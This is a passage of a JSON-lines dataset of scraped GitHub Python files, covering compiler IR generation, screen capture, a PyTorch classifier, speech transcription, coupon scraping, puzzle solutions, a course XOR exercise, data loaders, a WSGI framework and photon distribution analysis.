byte_one = ir.Constant(irtype(\"byte\"), 0x1)\n last_byte = builder.and_(byte_one, operand)\n return builder.sub(byte_one, operand)\n\n\n\n\ndef irgen_binary(builder, operator, first, second):\n \"\"\"\n Generate a code sequence producing the result of a \n binary operation\n \"\"\"\n operations = dict({\"+\": builder.add,\n \"-\": builder.sub,\n \"*\": builder.mul,\n \"/\": builder.sdiv,\n \"%\": builder.srem,\n \"&\": builder.and_,\n \"|\": builder.or_,\n \"and\": builder.and_, \n \"or\": builder.or_,\n })\n\n comparisons = [\"==\", \"!=\", \"<\", \"<=\", \">=\", \">\",]\n\n if operator in comparisons:\n return builder.icmp_signed(operator, first, second) \n \n return operations[operator](first, second)\n\n\n# Since assignments can only be done on base types,\n# we always return a pointer to a base type\ndef irgen_lvalue(lvalue, builder, table):\n \"\"\"\n Generate an address of an lvalue \n \"\"\"\n addr = table[lvalue.value]\n val = addr\n if lvalue.children:\n exprs = [irgen_expr(child, builder, table) for child in lvalue.children]\n for expr in exprs[:-1]:\n val = builder.gep(addr, [expr])\n addr = builder.load(val)\n val = builder.gep(addr, [exprs[-1]])\n \n return val \n\ndef irgen_call(builder, name, args, table):\n mangled = table.mangles[name]\n irfunction = table.gtable.funcs[mangled]\n func = irfunction.func\n extra = irfunction.args\n # Extra args are ref, so we pass an address\n args += [table[arg] for arg in extra]\n # Hack used because of the way we represent arrays\n # If we saved the array addresses and made array variables\n # mutable, we wouldn't need it\n for n, expected in enumerate(func.args):\n if expected.type == ir.PointerType(args[n].type):\n args[n] = args[n].operands[0] \n return builder.call(func, args)\n","repo_name":"etsal/compiler","sub_path":"compiler/codegen/expr.py","file_name":"expr.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14698007430","text":"import os\nimport sys\nimport time\n\nimport pyautogui as pg\nfrom termcolor import colored\n\n\nclass ScreenCapture(object):\n def __init__(self):\n self.pages = 0\n self.upperleft = (0, 0)\n self.lowerright = (0, 0)\n self.color = 'blue'\n self.question = 'red'\n self.border = (\"\\n=================================next=================================\")\n\n def size_check(self):\n print(colored(self.border, self.color))\n print(colored(\"search screen size of your book, so you follow next instructions\", self.color))\n print(colored(\"your screen size : \", self.color), pg.size())\n time.sleep(1)\n\n def display_set(self):\n print(colored(self.border, self.color))\n\n set_by_mouse = input(colored(\"use mouse ? [y/n] : \", self.question))\n\n if (set_by_mouse == 'y'):\n print(colored(self.border, self.color))\n ready = input(colored(\"Set your mouse cursor in upper_left corner.\\n After finishig your preparetions ? [ok] : \", self.question))\n if (ready == \"ok\"):\n self.upperleft = pg.position()\n print(colored(\"upper_left corner : \", self.color), self.upperleft)\n print(colored(self.border, self.color))\n ready = input(colored(\"Set your mouse cursor in lower_right corner.\\n After finishig your preparetions ? [ok] : \", self.question))\n if (ready == \"ok\"):\n self.lowerright = pg.position()\n print(colored(\"upper_right corner : \", self.color), self.lowerright)\n else:\n print(colored(\"error\", self.color))\n sys.exit()\n else:\n print(colored(\"error\", self.color))\n sys.exit()\n else:\n self.upperleft = (0, 0)\n self.lowerright = pg.size()\n print(colored(\"upper_left corner : \", self.color), self.upperleft)\n print(colored(\"upper_right corner : \", self.color), self.lowerright)\n\n def screen_shot(self):\n ##### warning : change double scale in Macbookpro #####\n left = 2*int(self.upperleft[0])\n upper = 2*int(self.upperleft[1])\n width = 2*int(self.lowerright[0]) - 2*int(self.upperleft[0])\n height = 2*int(self.lowerright[1]) - 2*int(self.upperleft[1])\n region = (left, upper, width, height)\n\n print(colored(\"region : \", self.color), region)\n print(colored(\"Finish defining region\", self.color))\n time.sleep(1)\n\n print(colored(self.border, self.color))\n pages = input(colored(\"Please input number of pages ? [INT] : \", self.question))\n self.pages = int(pages)\n print(colored(\"pages : \", self.color), self.pages)\n print(colored(\"Finish defining pages\", self.color))\n time.sleep(1)\n\n print(colored(self.border, self.color))\n print(colored(\"Set first page of your book with full screen within 3 seconds\", self.color))\n ready = input(colored(\"Can I start shooting ? [ok] : \", self.question))\n if (ready == \"ok\"):\n time.sleep(3)\n for i in range(self.pages):\n sc = pg.screenshot(region=region)\n sc.save('target/' + str(i + 1) + '.png')\n time.sleep(0.5)\n # pg.press(\"left\")\n pg.press(\"right\")\n time.sleep(0.5)\n else:\n print(colored(\"cancel.......\", self.color))\n sys.exit()\n","repo_name":"daichikvn/png_to_pdf_converter","sub_path":"models/autopict.py","file_name":"autopict.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27326077932","text":"from datetime import date, timedelta\nfrom typing import Tuple\n\n\ndef get_required_dates() -> Tuple[date, date]:\n \"\"\"This processing will always be done for the month that just finished. This function returns the start and end date of the previous month.\n Will be used to remove rows from the input CSVs that contain transactions not in this date range\n\n Returns:\n Tuple[date, date]: (start date, end date) of the range we want to include transactions for.\n Transactions outside this range will not be included in the budgeting calculations\n \"\"\"\n today = date.today()\n last_day_of_prev_month = today.replace(day=1) - timedelta(days=1)\n first_day_of_prev_month = today.replace(day=1) - timedelta(\n days=last_day_of_prev_month.day\n )\n\n return (first_day_of_prev_month, last_day_of_prev_month)\n","repo_name":"Aditya-Kharosekar/monthly-budgeting","sub_path":"utils/dateutils.py","file_name":"dateutils.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15839740102","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torchvision.ops import roi_align\nfrom torchvision import models\n\n\ndef build_model(base: str, n_classes: int, **kwargs) -> nn.Module:\n return Model(base=base, n_classes=n_classes, **kwargs)\n\n\nclass Model(nn.Module):\n def __init__(\n self, *, base: str, head: str,\n n_classes: int, head_dropout: float,\n use_sequences: bool, **base_kwargs,\n ):\n super().__init__()\n self.base = ResNetBase(base, **base_kwargs)\n self.res_l1 = 3\n self.res_l2 = 3\n self.use_sequences = use_sequences\n head_cls = globals()[head]\n self.head = head_cls(\n in_features=(self.base.out_features_l1 * self.res_l1 ** 2 +\n self.base.out_features_l2 * self.res_l2 ** 2),\n n_classes=n_classes,\n dropout=head_dropout)\n if self.use_sequences: # unused\n self.lstm = nn.LSTM(\n input_size=self.head.hidden_dim,\n hidden_size=self.head.hidden_dim // 2,\n bidirectional=True)\n\n def forward(self, x):\n x, rois, sequences = x\n _, _, input_h, input_w = x.shape\n x_l1, x_l2 = self.base(x)\n dtype = x_l1.dtype\n rois = [roi.to(dtype) for roi in rois]\n del x\n x_l1 = roi_align(\n x_l1, rois,\n output_size=(self.res_l1, self.res_l1),\n spatial_scale=x_l1.shape[3] / input_w,\n )\n x_l2 = roi_align(\n x_l2, rois,\n output_size=(self.res_l2, self.res_l2),\n spatial_scale=x_l2.shape[3] / input_w,\n )\n x = torch.cat(\n [x_l1.flatten(start_dim=1),\n x_l2.flatten(start_dim=1)],\n dim=1)\n x, x_features = self.head(x)\n if self.use_sequences: # unused\n x_features = self._apply_lstm(x_features, rois, sequences)\n x = self.head.apply_fc_out(x_features)\n return x, x_features, rois\n\n def _apply_lstm(self, x, rois, sequences): # unused\n assert len(rois) == len(sequences)\n assert x.shape[0] == sum(map(len, rois))\n offset = 0\n output = torch.zeros_like(x)\n for item_rois, item_sequences in zip(rois, sequences):\n assert item_rois.shape[0] == sum(map(len, item_sequences))\n for sequence in item_sequences:\n offset_sequence = sequence + offset\n seq_input = x[offset_sequence]\n seq_output, _ = self.lstm(seq_input.unsqueeze(1))\n output[offset_sequence] = seq_output.squeeze(1)\n offset += item_rois.shape[0]\n return output\n\n\ndef get_output(x_rois):\n x, x_features, rois = x_rois\n return x\n\n\nclass Head(nn.Module):\n def __init__(self, in_features: int, n_classes: int, dropout: float):\n super().__init__()\n self.hidden_dim = 1024\n self.dropout = nn.Dropout(dropout) if dropout else None\n self.fc1 = nn.Linear(in_features, self.hidden_dim)\n self.bn = nn.BatchNorm1d(self.hidden_dim)\n self.fc2 = nn.Linear(self.hidden_dim, n_classes)\n\n def forward(self, x):\n if self.dropout is not None:\n x = self.dropout(x)\n x = F.relu(self.fc1(x))\n if self.dropout is not None:\n x = self.dropout(x)\n x_features = self.bn(x)\n x = self.apply_fc_out(x_features)\n return x, x_features\n\n def apply_fc_out(self, x):\n return self.fc2(x)\n\n\nclass Head2(nn.Module): # unused\n def __init__(self, in_features: int, n_classes: int, dropout: float):\n super().__init__()\n self.hidden_dim = 1024\n self.dropout = nn.Dropout(dropout) if dropout else None\n self.fc1 = nn.Linear(in_features, self.hidden_dim)\n self.bn1 = nn.BatchNorm1d(self.hidden_dim)\n self.fc2 = nn.Linear(self.hidden_dim, self.hidden_dim)\n self.bn2 = nn.BatchNorm1d(self.hidden_dim)\n self.fc3 = nn.Linear(self.hidden_dim, n_classes)\n\n def forward(self, x):\n if self.dropout is not None:\n x = self.dropout(x)\n x = F.relu(self.fc1(x))\n if self.dropout is not None:\n x = self.dropout(x)\n x = self.bn1(x)\n x = F.relu(self.fc2(x))\n if self.dropout is not None:\n x = self.dropout(x)\n x_features = self.bn2(x)\n x = self.apply_fc_out(x_features)\n return x, x_features\n\n def apply_fc_out(self, x):\n return self.fc3(x)\n\n\nclass Head3(nn.Module): # unused\n def __init__(self, in_features: int, n_classes: int, dropout: float):\n super().__init__()\n self.dropout = nn.Dropout(dropout) if dropout else None\n self.fc = nn.Linear(in_features, n_classes)\n\n def forward(self, x):\n if self.dropout is not None:\n x = self.dropout(x)\n x = self.apply_fc_out(x)\n return x, x\n\n def apply_fc_out(self, x):\n return self.fc(x)\n\n\nclass ResNetBase(nn.Module):\n def __init__(self, name: str, frozen_start: bool, fp16: bool):\n super().__init__()\n if name.endswith('_wsl'):\n self.base = torch.hub.load('facebookresearch/WSL-Images', name)\n else:\n self.base = getattr(models, name)(pretrained=True)\n self.frozen_start = frozen_start\n self.fp16 = fp16\n if name == 'resnet34':\n self.out_features_l1 = 256\n self.out_features_l2 = 512\n else:\n self.out_features_l1 = 512\n self.out_features_l2 = 1024\n\n self.frozen = []\n if self.frozen_start:\n self.frozen = [self.base.layer1, self.base.conv1, self.base.bn1]\n for m in self.frozen:\n self._freeze(m)\n\n def forward(self, x):\n base = self.base\n x = base.conv1(x)\n x = base.bn1(x)\n x = base.relu(x)\n x = base.maxpool(x)\n x = base.layer1(x)\n x_l1 = base.layer2(x)\n del x\n x_l2 = base.layer3(x_l1)\n return x_l1, x_l2\n\n def train(self, mode=True):\n super().train(mode=mode)\n for m in self.frozen:\n self._bn_to_eval(m)\n\n def _freeze(self, module):\n for p in module.parameters():\n p.requires_grad = False\n\n def _bn_to_eval(self, module):\n for m in module.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n","repo_name":"lopuhin/kaggle-kuzushiji-2019","sub_path":"kuzushiji/classify/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6424,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"31"} +{"seq_id":"72151045528","text":"from transformers import Wav2Vec2Processor, Wav2Vec2ForCTC\nimport librosa\nimport torch\n# Use a pipeline as a high-level helper\nfrom transformers import pipeline\n\npipe = pipeline(\"automatic-speech-recognition\", model=\"khanhld/wav2vec2-base-vietnamese-160h\")\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nprocessor = Wav2Vec2Processor.from_pretrained(\"khanhld/wav2vec2-base-vietnamese-160h\")\nmodel = Wav2Vec2ForCTC.from_pretrained(\"khanhld/wav2vec2-base-vietnamese-160h\")\nmodel.to(device)\n\ndef transcribe(wav):\n input_values = processor(wav, sampling_rate=16000, return_tensors=\"pt\").input_values\n logits = model(input_values.to(device)).logits\n pred_ids = torch.argmax(logits, dim=-1)\n pred_transcript = processor.batch_decode(pred_ids)[0]\n return pred_transcript\n\n\nwav, _ = librosa.load(r'E:\\HHP\\wav2vec\\00006.wav', sr = 16000)\nprint(f\"transcript: {transcribe(wav)}\")\n","repo_name":"VuDinhKhai/speed_to_text","sub_path":"wav2vec/wav2vec.py","file_name":"wav2vec.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35484113475","text":"import re\nfrom ClassWebScrapping import WebScrapping \nfrom ClassLogging import Logging\nfrom ClassFileOperations import FileOperations\nfrom ClassJSON import *\nfrom Categorizer import *\n\nLINKS = [[\" PromoCodeClub \", \" Freecharge \", \"http://promocodeclub.com/freecharge-promo-code-and-coupons/\"],\n [\" PromoCodeClub \", \" Mobikwik \", \"http://promocodeclub.com/mobikwik-promo-code-and-coupons/\"],\n [\" PromoCodeClub \", \" Paytm \", \"http://promocodeclub.com/paytm-promo-code-and-coupons/\"]]\nListOfOffers = []\n\nobjLogging = Logging(3)\nobjFileOp = FileOperations()\n\ndef Tag(text, dictionary, tags_list):\n bIsAttached = False\n text = text.lower()\n for key in dictionary:\n if key in text:\n bIsAttached = True\n tags_list.append(dictionary[key])\n return bIsAttached\n\n\ndef FindDiscount(text):\n\n\tnum = re.search('(\\d)+', text)\n\tif num != None :\n\t\treturn num.group(0)\n\n\treturn '0'\n\n\ndef AddSimpleTags(text):\n\n tags_list = []\n if not Tag(text, users_categorizer, tags_list) :\n tags_list.append('All Users')\n if not Tag(text, type_categorizer, tags_list) :\n objLogging.log(1, \"Didn't attach type tag...\")\n if not Tag(text, airtel_categorizer, tags_list) :\n tags_list.append('Airtel and Others')\n if not Tag(text, offerdeal_categorizer, tags_list) :\n tags_list.append('Deal')\n\n return tags_list\n\ndef GetOffersDealsList(CompleteList) :\n\tOffers = []\n\tDeals = []\n\n\tfor item in CompleteList:\n\t\tif 'Offer' in item['Tags'] :\n\t\t\tOffers.append(item)\n\t\telse :\n\t\t\tDeals.append(item)\n\n\treturn [Offers, Deals]\n\ndef PromoCodeClubDotCom(link, name, tag_name):\n\n # Initialize and get source code\n ObjPromocodeclub = WebScrapping(link, name)\n objLogging.log(0, ObjPromocodeclub)\n \n # Get List of offers\n CompleteList = ObjPromocodeclub.GetListByDivAndClass(\"jcorgcr-hover-container\")\n objLogging.log(0, len(CompleteList))\n\n # Display each offers \n for eachItem in CompleteList:\n offer_object = {}\n offer_object['Site'] = tag_name\n \n # Get full info\n details = ObjPromocodeclub.GetChildren(eachItem.div)\n \n # Get Title\n objLogging.log(2, ObjPromocodeclub.TagText(details[1]))\n offer_object['Title'] = ObjPromocodeclub.TagText(details[1]) \n \n # Get Body\n couponCode = ObjPromocodeclub.GetParsed(str(details[5])) \n temp = ObjPromocodeclub.GetChildren(couponCode.body.ul)\n \n # Get Description\n description = temp[1]\n objLogging.log(2, description.get_text())\n offer_object['Description'] = description.get_text()\n \n # Get Promo Code\n promocode = ObjPromocodeclub.GetChildren(temp[3])[1] \n objLogging.log(2, promocode.get_text())\n offer_object['Promocode'] = promocode.get_text()\n \n tags_list = AddSimpleTags(ObjPromocodeclub.TagText(details[1]) + \" \" + description.get_text()) \n offer_object['Tags'] = tags_list\n\n discount = FindDiscount(description.get_text())\n offer_object['Discount'] = int(discount)\n\n ListOfOffers.append(offer_object)\n # Print splitter line\n objLogging.PrintLine(2) \n \nif __name__ == \"__main__\": \n \n for link in LINKS: \n objLogging.log(2, \" \\n ************* \" + link[0] + \" \" + link[1] + \" *************\\n\")\n PromoCodeClubDotCom(link[2], link[0] + \"-\" + link[1]+\".html\", link[1])\n\n Offers, Deals = GetOffersDealsList(ListOfOffers)\n\n Offers = sorted(Offers, key = lambda k : k['Discount'], reverse = True)\n Deals = sorted(Deals, key = lambda k : k['Discount'], reverse = True)\n\n offersJSONObj = JSONify(Offers)\n dealsJSONObj = JSONify(Deals)\n \n JSONtoCSV(offersJSONObj)","repo_name":"bhaveshmunot1/CouponCodes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9144147262","text":"from shared.Intcode import Computer\n\nfrom typing import Dict, Tuple\n\n\ndef main():\n computer = load()\n\n surface = run_painting(computer, start_color=0)\n\n print(\"Painted %d squares at least once.\" % len(surface))\n\n\ndef load() -> Computer:\n with open(\"input/input11.txt\", \"r\") as f:\n return Computer.from_string(f.read())\n\n\ndef run_painting(computer: Computer, start_color: int) -> Dict[Tuple[int, int], int]:\n robot_coord = (0, 0)\n direction = (0, -1)\n surface = dict()\n computer.inputs.append(start_color)\n while True:\n color = computer.run_until_output()\n if color is None:\n break\n surface[robot_coord] = color\n\n turn_direction = computer.run_until_output()\n if turn_direction is None:\n break\n direction = turn(direction, turn_direction)\n robot_coord = tuple((robot_coord[0] + direction[0], robot_coord[1] + direction[1]))\n\n computer.inputs.append(get_surface_color(surface, robot_coord))\n\n return surface\n\n\ndef get_surface_color(surface: Dict[Tuple[int, int], int], pos: Tuple[int, int]) -> int:\n return surface[pos] if pos in surface else 0\n\n\ndef turn(curr: Tuple[int, int], turn_direction: int) -> Tuple[int, int]:\n directions = [(0, -1), (1, 0), (0, 1), (-1, 0)]\n index = directions.index(curr)\n index += 1 if turn_direction == 1 else -1\n return directions[index % 4]\n\n\n#\n\n\n#\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cgdilley/AdventOfCode2019","sub_path":"[Day11.1]SpacePolice.py","file_name":"[Day11.1]SpacePolice.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72066102807","text":"pw2 = \"L00k_At_M3_Carefu11y\"\n\ncount = 0\n\nkey1 = 0x9f\nkey2 = 0x33\n\nfor p in pw2:\n\tcount += 1\n\tif count % 2 == 0:\n\t\tkey = key1\n\telse:\n\t\tkey = key2\n\t\t\n\t\t\n\tprint (\"%02x\" % (ord(p) ^ key ))\n\t\n","repo_name":"hazelash/RE_Course","sub_path":"Day5/regkey.py","file_name":"regkey.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"27611072496","text":"\"\"\"\n================================\nPhoton distribution analysis - 2\n================================\n\nPhoton distribution analysis as described in https://pubs.acs.org/doi/abs/10.1021/jp057257\n\n\n\"\"\"\nimport glob\nimport numpy as np\nimport scipy.optimize\nimport pylab as plt\nimport tttrlib\n\n\"\"\"\nThe experimental data is saved in separate files. The files are joined and the\nresulting TTTR object is processed.\n\"\"\"\n# open a set of files and stack them in a single TTTR object\nfiles = glob.glob('../../tttr-data/bh/bh_spc132_sm_dna/*.spc')\ndata = tttrlib.TTTR(files[0], 'SPC-130')\nfor d in files[1:]:\n data.append(tttrlib.TTTR(d, 'SPC-130'))\n\n\"\"\"\nAs first step, the experimental counting histogram needs to be computed. For that,\nthe photon trace is split into time-windows (TWs) of a certain length (here 1 milli second).\nThe Photon Distribution Analysis (PDA) counting histogram is computed for two channels\n(channel_1 and channel_2). The two channels are defined based on the routing channel\nnumber. In the test data set, the routing channel numbers 0 and 8 correspond to the\ngreen detection channels and the routing channel number 1 and 9 correspond to the \nred detection channels.\n\nThe counting histogram is computed up to a maximum number of photons. Time windows\nthat have less photon counts than a certain number are discriminated from the counting\nhistogram.\n\"\"\"\n# Compute the experimental histograms\n# # define what is PDA channel 1 and channel 2\nchannels_1 = [0, 8] # 0, 8 are green channels\nchannels_2 = [1, 9] # 1,9 are red channels\nminimum_number_of_photons = 20\nmaximum_number_of_photons = 80\nminimum_time_window_length = 1.0e-3\n\n\"\"\"\nThe two dimensional counting histogram for the two channels is computed by the \nstatic method ``tttrlib.Pda.compute_experimental_histograms`` that returns\nadditionally a one dimentional counting histogram of the photon number and an\narray that contains pairs of start/stop indices of the TWs. \n\"\"\"\ns1s2_e, ps, tttr_indices = tttrlib.Pda.compute_experimental_histograms(\n tttr_data=data,\n channels_1=channels_1,\n channels_2=channels_2,\n maximum_number_of_photons=maximum_number_of_photons,\n minimum_number_of_photons=minimum_number_of_photons,\n minimum_time_window_length=minimum_time_window_length\n)\n\n\"\"\"\nTo compute a model counting histogram the minimum and maximum number of photons\nneed to be provided along with the probability of a certain total fluorescence P(F).\nIn this example P(F) is approximated by P(S). This approximation is invalid for \nsmall number of photon counts. For a better estimation of P(F) see \nhttps://pubs.acs.org/doi/abs/10.1021/jp072293p.\n\"\"\"\n# define a Pda object\nkw_pda = {\n \"hist2d_nmax\": maximum_number_of_photons,\n \"hist2d_nmin\": minimum_number_of_photons,\n \"pF\": ps\n}\npda = tttrlib.Pda(**kw_pda)\n\n\"\"\"\nThe two dimensional counting histogram is usually marginalized to a one dimensional\nrepresentation. The 2D histogram of the counts are for instance marginalized to a \nhistogram over the ratio of the green and red photon counts or to a proximity\nratio histogram. The function that converts the 2D histogram to a 1D histogram is \nassigned to the ``Pda`` object as a python function.\n\"\"\"\n# set a function to make a 1D histogram\n\n# proximity ratio = Pr = Sg / (Sg + Sr)\n# pda.histogram_function = lambda ch1, ch2: ch2 / max(1, (ch2 + ch1))\n\n# ratio of green and red signal = Sg / Sr\npda.histogram_function = lambda ch1, ch2: ch1 / max(1, ch2)\n\n\"\"\"\nThe background in the first and second channel controlled by corresponding \nattributes.\n\"\"\"\nbackground_ch1 = 1.7\nbackground_ch2 = 0.7\npda.background_ch1 = background_ch1\npda.background_ch2 = background_ch2\n\n\"\"\"\nThe probabilities of detecting photons in the first channel with corresponding \namplitudes are passed as argument to a method that computes a 1D histogram in a\ngiven range.\n\"\"\"\namplitudes = [0.25, 0.25, 0.25, 0.25]\nprobabilities_ch1 = [0.0, 0.35, 0.45, 0.9]\nkw_hist = {\n \"x_max\": 500.0,\n \"x_min\": 0.05,\n \"log_x\": True,\n \"n_bins\": 81,\n \"n_min\": 10\n}\nmodel_x, model_y = pda.get_1dhistogram(\n amplitudes=amplitudes,\n probabilities_ch1=probabilities_ch1,\n **kw_hist\n)\n\n\"\"\"\nThe corresponding experimental histogram is computed by passing the experimental \n2D counting histogram as an argument.\n\"\"\"\ndata_x, data_y = pda.get_1dhistogram(\n s1s2=s1s2_e.flatten(),\n **kw_hist\n)\nsd = np.sqrt(data_y)\nnp.place(sd, sd == 0, 10000000.0)\nweighted_residuals = (data_y - model_y) / sd\n\n\"\"\"\nTo optimize the parameters that determine the photon counting distribution we \ndefine an objective function that quantifies the disagreement between the model \nand the data and optimize the parameters of the objective function with \nscipy.minimize.\n\"\"\"\n\n\ndef chi2(\n x0: np.ndarray,\n y_data: np.ndarray,\n pda_object: tttrlib.Pda,\n n_species: int,\n kw_hist: dict\n):\n amplitudes = x0[:n_species]\n probabilities = x0[n_species:n_species * 2]\n background_ch1 = x0[n_species * 2 + 0]\n background_ch2 = x0[n_species * 2 + 1]\n pda_object.background_ch1 = background_ch1\n pda_object.background_ch2 = background_ch2\n x_model, y_model = pda_object.get_1dhistogram(\n amplitudes=amplitudes,\n probabilities_ch1=probabilities,\n **kw_hist\n )\n wres = (y_data - y_model) / sd\n return np.sum(wres**2.0)\n\n\nn_species = len(amplitudes)\nx0 = np.array(amplitudes + probabilities_ch1 + [background_ch1, background_ch2])\nbounds = [(0, np.inf)] * (2 * n_species) + [(0, 10), (0, 10)]\nfit = scipy.optimize.minimize(\n fun=chi2,\n x0=x0,\n bounds=bounds,\n args=(data_y, pda, n_species, kw_hist),\n)\n\n\"\"\"\nPlotting of the optimized histograms\n\"\"\"\nfitted_amplitudes = fit.x[:n_species]\nfitted_probabilities_ch1 = fit.x[n_species:2*n_species]\nfitted_background_ch1 = fit.x[n_species * 2 + 0]\nfitted_background_ch2 = fit.x[n_species * 2 + 1]\npda.background_ch1 =fitted_background_ch1\npda.background_ch2 =fitted_background_ch2\nmodel_fit_x, model_fit_y = pda.get_1dhistogram(\n amplitudes=fitted_amplitudes,\n probabilities_ch1=fitted_probabilities_ch1,\n **kw_hist\n)\nfit_wres = (data_y - model_fit_y) / sd\n\nfig, ax = plt.subplots(nrows=2, ncols=2)\nax[0, 0].set_title('Experimental S1S2')\nax[0, 1].set_title('1D Histograms')\nax[1, 0].set_title('Model S1S2')\nax[0, 0].set_ylabel('Signal(red)')\nax[0, 1].set_ylabel('w.res.')\nax[1, 1].set_xlabel('Signal(green)/Signal(red)')\nax[1, 1].set_ylabel('Counts')\nax[1, 0].set_xlabel('Signal(green)')\nax[1, 0].set_ylabel('Signal(red)')\nax[0, 0].imshow(s1s2_e[1:, 1:])\nax[1, 0].imshow(pda.s1s2[1:, 1:])\nax[1, 0].legend()\n\nfit_wres = np.nan_to_num(fit_wres, posinf=0, neginf=0)\ny_model_initial = np.nan_to_num(model_y, posinf=0, neginf=0)\nax[0, 1].set_ylim(-8, 8)\nif kw_hist['log_x']:\n ax[0, 1].semilogx(data_x, weighted_residuals, label=\"Initial\")\n ax[0, 1].semilogx(data_x, fit_wres, label=\"Optimized\")\n ax[1, 1].semilogx(model_x, y_model_initial, label=\"Initial\")\n ax[1, 1].semilogx(model_fit_x, model_fit_y, label=\"Optimized\")\n ax[1, 1].semilogx(data_x, data_y, label=\"Experiment\")\nelse:\n ax[0, 1].plot(data_x, weighted_residuals, label=\"Initial\")\n ax[0, 1].plot(data_x, fit_wres, label=\"Optimized\")\n ax[1, 1].plot(model_x, y_model_initial, label=\"Initial\")\n ax[1, 1].plot(model_fit_x, model_fit_y, label=\"Optimized\")\n ax[1, 1].plot(data_x, data_y, label=\"Experiment\")\nax[1, 1].legend()\nax[0, 1].legend()\nplt.tight_layout()\nplt.show()\n\n","repo_name":"Fluorescence-Tools/tttrlib","sub_path":"examples/single_molecule/plot_single_molecule_pda_2.py","file_name":"plot_single_molecule_pda_2.py","file_ext":"py","file_size_in_byte":7421,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"31"} +{"seq_id":"1337463212","text":"class Solution:\n def minStoneSum(self, piles: List[int], k: int) -> int:\n from queue import PriorityQueue\n l = len(piles)\n queue = PriorityQueue()\n for pile in piles:\n queue.put(-pile)\n for _ in range(k):\n val = ceil(-queue.get()/2)\n queue.put(-val)\n ans = 0\n for i in range(l):\n ans += -queue.get()\n return ans","repo_name":"KindOrca/LeetHub","sub_path":"1962-remove-stones-to-minimize-the-total/1962-remove-stones-to-minimize-the-total.py","file_name":"1962-remove-stones-to-minimize-the-total.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24935727622","text":"import os\nimport time\nimport numpy as np\nimport pandas as pd\nfrom dv import AedatFile, Event, Frame, Trigger, IMU\nfrom numpy.lib import recfunctions as rfn\n\n\nclass _data():\n def __init__(self) -> None:\n self._data = {\n 'size': None,\n 'events': None,\n 'frames': None,\n 'imu': None,\n 'triggers': None,\n }\n \n def __getitem__(self, _name):\n return self._data[_name]\n\n def __setitem__(self, _name, _value):\n if type(_value) is np.ndarray and _value.dtype.names is not None:\n _value = np.rec.array(_value)\n self._data[_name] = _value\n\n\ndef load_aedat4(path):\n data = _data()\n\n with AedatFile(path) as f:\n data['size'] = f['events'].size\n\n # events\n if 'events' in f.names:\n events = np.hstack([packet for packet in f['events'].numpy()])\n events_type = [('timestamp', ' {time.time() - st} s\")\n\n st = time.time()\n data = load_txt(os.path.join(main_dir, \"tests/demo-02.txt\"))\n print(f\"load txt file ==> {time.time() - st} s\")\n\n","repo_name":"KugaMas/event_camera_toolkit","sub_path":"file/fio_utils.py","file_name":"fio_utils.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4704275448","text":"# -*- coding: utf-8 -*-\n\nfrom abc import ABC, abstractmethod\nfrom zope.interface import Interface, implementer\nfrom .responder import reply\n\n\nclass BaseOverhead(ABC):\n\n @abstractmethod\n def set_data(self, data):\n \"\"\"Set the data coming from the processing of the action.\n \"\"\"\n\n\nclass View(ABC):\n pass\n\n \nclass APIView(View):\n \"\"\"Implementation of an action as a class.\n This works as an HTTP METHOD dispatcher.\n The method names of the class must be a valid uppercase HTTP METHOD name\n example : OPTIONS, GET, POST\n \"\"\"\n\n def __call__(self, environ, overhead):\n method = environ['REQUEST_METHOD'].upper()\n worker = getattr(self, method, None)\n if worker is None:\n # Method not allowed\n response = reply(405)\n else:\n response = worker(environ, overhead)\n return response\n\n\nclass APINode(ABC):\n\n @abstractmethod\n def process_endpoint(self, environ, routing_args):\n \"\"\"Process the looked up endpoint and returns a WSGI callable.\n \"\"\"\n\n @abstractmethod\n def lookup(self, path_info, environ):\n \"\"\"Lookups up the endpoint and returns the routing args, usually\n containing the possible conditional parameters and the controller.\n If nothing was found, returns None or a WSGI callable corresponding\n to the HTTP Error (404, 405, 406).\n \"\"\"\n\n def routing(self, environ):\n # according to PEP 3333 the native string representing PATH_INFO\n # (and others) can only contain unicode codepoints from 0 to 255,\n # which is why we need to decode to latin-1 instead of utf-8 here.\n # We transform it back to UTF-8\n path_info = environ['PATH_INFO'].encode('latin-1').decode('utf-8')\n routing_args = self.lookup(path_info, environ)\n if routing_args:\n return self.process_endpoint(environ, routing_args)\n return None\n\n def __call__(self, environ, start_response):\n response = self.routing(environ)\n if response is None:\n response = reply(\n 404, \"Not found. Please consult the API documentation.\")\n return response(environ, start_response)\n","repo_name":"Cromlech/dolmen.api_engine","sub_path":"src/dolmen/api_engine/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18643949430","text":"#!/usr/bin/env python3\n\nimport sys\nfrom argparse import ArgumentParser\n\nimport address_providers\nfrom 